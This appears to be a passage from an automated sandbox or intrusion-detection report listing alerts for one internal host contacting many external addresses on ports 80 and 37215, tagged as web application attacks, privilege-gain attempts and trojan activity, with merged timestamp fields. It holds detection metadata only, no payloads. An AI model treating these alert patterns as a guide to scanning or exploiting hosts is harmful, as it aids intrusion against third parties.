      Source Port:42420
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23197.246.107.15135100372152829579 01/26/24-15:32:53.792661
      SID:2829579
      Source Port:35100
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.2346.23.188.5536380802030092 01/26/24-15:31:13.988644
      SID:2030092
      Source Port:36380
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2338.59.4.25037470802025883 01/26/24-15:31:30.832217
      SID:2025883
      Source Port:37470
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2338.165.19.5959722802030092 01/26/24-15:31:52.717870
      SID:2030092
      Source Port:59722
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2313.113.68.2940470802030092 01/26/24-15:31:58.895992
      SID:2030092
      Source Port:40470
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2393.63.84.18940706802025883 01/26/24-15:32:21.603095
      SID:2025883
      Source Port:40706
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23168.76.22.16955064802030092 01/26/24-15:31:22.829928
      SID:2030092
      Source Port:55064
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23106.52.149.2557494802025883 01/26/24-15:32:14.899767
      SID:2025883
      Source Port:57494
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2375.101.206.19358582802025883 01/26/24-15:32:21.492792
      SID:2025883
      Source Port:58582
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2378.187.235.23659344802030092 01/26/24-15:32:32.918898
      SID:2030092
      Source Port:59344
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2343.140.243.5641060802030092 01/26/24-15:31:14.053818
      SID:2030092
      Source Port:41060
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2352.85.131.24559562802030092 01/26/24-15:31:47.589436
      SID:2030092
      Source Port:59562
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2381.150.7.20744056802030092 01/26/24-15:32:23.587676
      SID:2030092
      Source Port:44056
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2334.107.144.17433424802030092 01/26/24-15:31:37.805934
      SID:2030092
      Source Port:33424
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.232.20.93.937890802025883 01/26/24-15:31:58.816455
      SID:2025883
      Source Port:37890
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2369.135.54.10636628802030092 01/26/24-15:32:11.581498
      SID:2030092
      Source Port:36628
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23134.236.63.4959052802030092 01/26/24-15:32:12.175744
      SID:2030092
      Source Port:59052
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23138.188.47.4645194802030092 01/26/24-15:32:39.889155
      SID:2030092
      Source Port:45194
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23212.183.29.5340702802025883 01/26/24-15:32:47.917862
      SID:2025883
      Source Port:40702
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2352.196.131.23246070802025883 01/26/24-15:31:13.014919
      SID:2025883
      Source Port:46070
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23104.79.247.5443910802030092 01/26/24-15:32:23.572724
      SID:2030092
      Source Port:43910
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23120.24.228.4457014802030092 01/26/24-15:32:46.097536
      SID:2030092
      Source Port:57014
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23152.0.21.13756240802025883 01/26/24-15:31:31.568754
      SID:2025883
      Source Port:56240
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23148.251.126.8558662802025883 01/26/24-15:32:21.791036
      SID:2025883
      Source Port:58662
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2334.111.133.23858894802025883 01/26/24-15:32:56.725398
      SID:2025883
      Source Port:58894
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23134.209.129.20445966802025883 01/26/24-15:31:26.756022
      SID:2025883
      Source Port:45966
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.238.209.240.1343058802030092 01/26/24-15:31:18.206989
      SID:2030092
      Source Port:43058
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23173.194.223.12051554802030092 01/26/24-15:31:01.075466
      SID:2030092
      Source Port:51554
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2345.14.166.544134802025883 01/26/24-15:32:58.853882
      SID:2025883
      Source Port:44134
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23156.241.109.11940828372152829579 01/26/24-15:32:18.664967
      SID:2829579
      Source Port:40828
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.23103.151.120.21040842802030092 01/26/24-15:32:33.084081
      SID:2030092
      Source Port:40842
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2393.184.250.233602802030092 01/26/24-15:32:56.621551
      SID:2030092
      Source Port:33602
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23198.57.211.4834030802030092 01/26/24-15:32:56.773866
      SID:2030092
      Source Port:34030
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2379.132.142.4560932802030092 01/26/24-15:31:04.250547
      SID:2030092
      Source Port:60932
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23197.188.167.5936186802025883 01/26/24-15:31:23.180588
      SID:2025883
      Source Port:36186
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.235.253.0.5242830802030092 01/26/24-15:32:44.946639
      SID:2030092
      Source Port:42830
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2383.240.212.19446456802025883 01/26/24-15:32:21.868639
      SID:2025883
      Source Port:46456
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23213.183.59.24454690802030092 01/26/24-15:32:21.865408
      SID:2030092
      Source Port:54690
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2338.177.201.847482802025883 01/26/24-15:32:30.581668
      SID:2025883
      Source Port:47482
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2352.163.56.3434990802025883 01/26/24-15:32:24.018002
      SID:2025883
      Source Port:34990
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23159.69.144.11053778802025883 01/26/24-15:32:48.799773
      SID:2025883
      Source Port:53778
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23198.46.203.3945072802030092 01/26/24-15:32:47.575690
      SID:2030092
      Source Port:45072
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2335.223.2.16043372802030092 01/26/24-15:32:41.790683
      SID:2030092
      Source Port:43372
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2389.117.50.16039032802030092 01/26/24-15:31:18.793714
      SID:2030092
      Source Port:39032
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2323.59.184.24640766802025883 01/26/24-15:31:53.132854
      SID:2025883
      Source Port:40766
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23174.129.134.13157028802025883 01/26/24-15:32:18.241039
      SID:2025883
      Source Port:57028
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2323.207.85.2538660802025883 01/26/24-15:31:36.980434
      SID:2025883
      Source Port:38660
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2345.143.98.8452284802025883 01/26/24-15:31:54.084287
      SID:2025883
      Source Port:52284
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2380.211.121.12436946802030092 01/26/24-15:31:44.072128
      SID:2030092
      Source Port:36946
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2323.15.47.8338132802025883 01/26/24-15:32:28.552407
      SID:2025883
      Source Port:38132
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23204.174.66.8939856802030092 01/26/24-15:31:43.968492
      SID:2030092
      Source Port:39856
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23154.95.217.17434028802030092 01/26/24-15:32:19.891483
      SID:2030092
      Source Port:34028
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23138.201.91.23248082802030092 01/26/24-15:31:41.784028
      SID:2030092
      Source Port:48082
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23202.143.87.21234310802030092 01/26/24-15:32:53.578197
      SID:2030092
      Source Port:34310
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23172.121.187.15151508802025883 01/26/24-15:32:47.613814
      SID:2025883
      Source Port:51508
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23144.196.51.22148752802030092 01/26/24-15:31:36.579593
      SID:2030092
      Source Port:48752
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2352.202.65.12952068802025883 01/26/24-15:31:37.817906
      SID:2025883
      Source Port:52068
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2367.7.139.18651592802030092 01/26/24-15:31:44.584489
      SID:2030092
      Source Port:51592
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23156.224.12.16259940372152835222 01/26/24-15:33:01.456416
      SID:2835222
      Source Port:59940
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.2327.74.199.24149786802030092 01/26/24-15:32:36.350234
      SID:2030092
      Source Port:49786
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2341.47.185.5860580372152829579 01/26/24-15:31:53.094755
      SID:2829579
      Source Port:60580
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.2352.16.167.22043164802030092 01/26/24-15:31:52.881132
      SID:2030092
      Source Port:43164
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23117.20.106.5755902802025883 01/26/24-15:31:26.892259
      SID:2025883
      Source Port:55902
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2352.26.29.20958962802030092 01/26/24-15:32:32.545697
      SID:2030092
      Source Port:58962
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2313.55.166.21340060802030092 01/26/24-15:32:35.983520
      SID:2030092
      Source Port:40060
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2323.223.101.13038824802030092 01/26/24-15:32:07.813353
      SID:2030092
      Source Port:38824
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23162.14.101.3338388802025883 01/26/24-15:31:26.997595
      SID:2025883
      Source Port:38388
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23121.67.77.25041980802030092 01/26/24-15:32:33.043388
      SID:2030092
      Source Port:41980
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23108.156.251.23339180802030092 01/26/24-15:32:21.585684
      SID:2030092
      Source Port:39180
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23184.51.27.22247982802030092 01/26/24-15:32:07.295597
      SID:2030092
      Source Port:47982
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2323.201.134.2259708802025883 01/26/24-15:32:30.795973
      SID:2025883
      Source Port:59708
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2354.69.13.2843748802025883 01/26/24-15:31:16.977419
      SID:2025883
      Source Port:43748
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23104.107.147.5552544802025883 01/26/24-15:32:01.807428
      SID:2025883
      Source Port:52544
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.232.23.6.5060212802030092 01/26/24-15:31:26.851705
      SID:2030092
      Source Port:60212
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23104.24.90.8534596802025883 01/26/24-15:32:25.541697
      SID:2025883
      Source Port:34596
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23173.95.53.15444912802025883 01/26/24-15:31:47.666291
      SID:2025883
      Source Port:44912
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2366.251.154.22433574802030092 01/26/24-15:32:50.968261
      SID:2030092
      Source Port:33574
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2381.199.207.15437160802030092 01/26/24-15:32:01.907069
      SID:2030092
      Source Port:37160
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2352.87.15.13548334802025883 01/26/24-15:32:19.584226
      SID:2025883
      Source Port:48334
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23154.208.206.14256540802025883 01/26/24-15:32:25.566003
      SID:2025883
      Source Port:56540
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.232.21.34.9438766802030092 01/26/24-15:32:11.844043
      SID:2030092
      Source Port:38766
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2335.197.22.6754360802025883 01/26/24-15:32:56.785126
      SID:2025883
      Source Port:54360
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23133.223.33.19153554802030092 01/26/24-15:32:25.532569
      SID:2030092
      Source Port:53554
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2384.104.15.14847840802025883 01/26/24-15:33:01.527808
      SID:2025883
      Source Port:47840
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23190.102.101.20333268802030092 01/26/24-15:32:28.469184
      SID:2030092
      Source Port:33268
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2377.246.102.7938904802030092 01/26/24-15:32:19.760228
      SID:2030092
      Source Port:38904
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2313.49.35.10336988802025883 01/26/24-15:32:28.348521
      SID:2025883
      Source Port:36988
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2364.182.87.5945922802025883 01/26/24-15:31:13.719950
      SID:2025883
      Source Port:45922
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23151.205.173.3258482802025883 01/26/24-15:32:47.726111
      SID:2025883
      Source Port:58482
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23207.58.183.942880802030092 01/26/24-15:31:01.067805
      SID:2030092
      Source Port:42880
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23164.46.69.6043902802025883 01/26/24-15:31:55.641850
      SID:2025883
      Source Port:43902
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2323.57.227.14258234802025883 01/26/24-15:31:51.452288
      SID:2025883
      Source Port:58234
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2313.226.190.7859202802030092 01/26/24-15:32:01.354131
      SID:2030092
      Source Port:59202
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23172.255.248.15041094802030092 01/26/24-15:33:01.959349
      SID:2030092
      Source Port:41094
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23154.19.112.20358058802030092 01/26/24-15:31:58.717861
      SID:2030092
      Source Port:58058
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23154.81.106.11046190802025883 01/26/24-15:32:35.690212
      SID:2025883
      Source Port:46190
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2320.240.179.11142334802025883 01/26/24-15:32:04.835960
      SID:2025883
      Source Port:42334
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2346.242.156.19355956802025883 01/26/24-15:31:30.666540
      SID:2025883
      Source Port:55956
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2323.211.159.19633108802030092 01/26/24-15:31:53.309815
      SID:2030092
      Source Port:33108
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.235.152.238.536550802030092 01/26/24-15:32:07.844825
      SID:2030092
      Source Port:36550
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2323.196.72.23146890802025883 01/26/24-15:32:15.819740
      SID:2025883
      Source Port:46890
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23212.108.44.17052582802025883 01/26/24-15:32:25.494020
      SID:2025883
      Source Port:52582
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23184.24.204.4847744802030092 01/26/24-15:31:26.778442
      SID:2030092
      Source Port:47744
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2365.25.201.9034906802030092 01/26/24-15:31:49.478185
      SID:2030092
      Source Port:34906
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23106.52.83.14857368802030092 01/26/24-15:32:07.993078
      SID:2030092
      Source Port:57368
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23219.251.84.17336000802025883 01/26/24-15:32:33.033787
      SID:2025883
      Source Port:36000
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23212.76.114.21245362802030092 01/26/24-15:31:26.866788
      SID:2030092
      Source Port:45362
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23192.169.174.23060688802030092 01/26/24-15:31:01.265787
      SID:2030092
      Source Port:60688
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2361.238.90.22750688802030092 01/26/24-15:31:17.092095
      SID:2030092
      Source Port:50688
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23110.88.128.18545170802025883 01/26/24-15:32:30.780797
      SID:2025883
      Source Port:45170
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2313.35.117.24748038802030092 01/26/24-15:31:01.184559
      SID:2030092
      Source Port:48038
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2383.4.148.19847134802030092 01/26/24-15:32:36.974292
      SID:2030092
      Source Port:47134
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23202.40.219.19959744802030092 01/26/24-15:31:47.532173
      SID:2030092
      Source Port:59744
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.238.130.31.21353132802030092 01/26/24-15:31:51.441434
      SID:2030092
      Source Port:53132
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23168.188.78.12934690802030092 01/26/24-15:31:32.999864
      SID:2030092
      Source Port:34690
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23138.68.44.23233814802030092 01/26/24-15:31:52.709758
      SID:2030092
      Source Port:33814
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2318.154.51.16553824802030092 01/26/24-15:31:13.820473
      SID:2030092
      Source Port:53824
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2334.66.136.20042328802030092 01/26/24-15:31:23.711502
      SID:2030092
      Source Port:42328
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2354.157.101.12738484802025883 01/26/24-15:32:53.420753
      SID:2025883
      Source Port:38484
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.232.23.231.4857626802025883 01/26/24-15:32:48.222059
      SID:2025883
      Source Port:57626
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23156.241.94.10647522372152835222 01/26/24-15:32:48.825043
      SID:2835222
      Source Port:47522
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.23162.144.71.10436660802030092 01/26/24-15:32:04.770717
      SID:2030092
      Source Port:36660
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2318.198.182.19860782802030092 01/26/24-15:32:21.578212
      SID:2030092
      Source Port:60782
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2347.103.45.3158052802030092 01/26/24-15:32:13.113446
      SID:2030092
      Source Port:58052
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23125.141.214.17657886802025883 01/26/24-15:31:27.982300
      SID:2025883
      Source Port:57886
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23185.45.103.6455502802030092 01/26/24-15:31:41.714509
      SID:2030092
      Source Port:55502
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23163.5.154.2347448802025883 01/26/24-15:31:49.533515
      SID:2025883
      Source Port:47448
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2365.9.190.8041628802025883 01/26/24-15:31:51.771759
      SID:2025883
      Source Port:41628
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23156.244.93.14353030802025883 01/26/24-15:31:41.576601
      SID:2025883
      Source Port:53030
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23154.82.120.2445632802030092 01/26/24-15:32:28.451268
      SID:2030092
      Source Port:45632
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23104.71.251.9738056802025883 01/26/24-15:32:07.600425
      SID:2025883
      Source Port:38056
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2313.249.180.19955930802030092 01/26/24-15:31:30.559266
      SID:2030092
      Source Port:55930
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23143.204.96.6033308802030092 01/26/24-15:32:18.732902
      SID:2030092
      Source Port:33308
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2364.44.24.19941134802030092 01/26/24-15:31:52.674016
      SID:2030092
      Source Port:41134
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23162.215.114.25336810802030092 01/26/24-15:32:48.749852
      SID:2030092
      Source Port:36810
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2343.140.208.18834050802025883 01/26/24-15:32:22.048780
      SID:2025883
      Source Port:34050
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2338.177.55.13441246802030092 01/26/24-15:32:22.560237
      SID:2030092
      Source Port:41246
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23192.249.112.17734900802030092 01/26/24-15:31:35.552555
      SID:2030092
      Source Port:34900
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23103.51.145.5143612802025883 01/26/24-15:31:43.888363
      SID:2025883
      Source Port:43612
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23183.255.117.4441112802025883 01/26/24-15:32:40.101073
      SID:2025883
      Source Port:41112
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2323.215.23.3059722802025883 01/26/24-15:31:44.065852
      SID:2025883
      Source Port:59722
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2320.93.126.9855832802030092 01/26/24-15:33:00.496099
      SID:2030092
      Source Port:55832
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2338.254.102.19336296802025883 01/26/24-15:31:41.705239
      SID:2025883
      Source Port:36296
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23106.75.143.13134368802030092 01/26/24-15:32:50.178295
      SID:2030092
      Source Port:34368
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23221.143.28.4843484802025883 01/26/24-15:32:59.009997
      SID:2025883
      Source Port:43484
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2320.88.0.21156950802030092 01/26/24-15:32:48.719029
      SID:2030092
      Source Port:56950
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2379.129.85.4050426802030092 01/26/24-15:32:53.836183
      SID:2030092
      Source Port:50426
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2387.55.253.13856330802025883 01/26/24-15:32:09.847234
      SID:2025883
      Source Port:56330
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23156.244.93.14353710802030092 01/26/24-15:31:55.700501
      SID:2030092
      Source Port:53710
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23147.46.85.25539674802025883 01/26/24-15:32:04.696625
      SID:2025883
      Source Port:39674
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23223.119.221.2845936802025883 01/26/24-15:32:42.152481
      SID:2025883
      Source Port:45936
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2370.37.208.22547012802025883 01/26/24-15:32:41.653011
      SID:2025883
      Source Port:47012
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2318.164.249.7846800802025883 01/26/24-15:31:01.375993
      SID:2025883
      Source Port:46800
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23196.205.27.22641806802025883 01/26/24-15:32:04.941163
      SID:2025883
      Source Port:41806
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2323.58.241.8340892802025883 01/26/24-15:32:25.540390
      SID:2025883
      Source Port:40892
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2391.220.229.24957652802025883 01/26/24-15:31:44.826702
      SID:2025883
      Source Port:57652
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2396.7.144.13155714802025883 01/26/24-15:31:17.001022
      SID:2025883
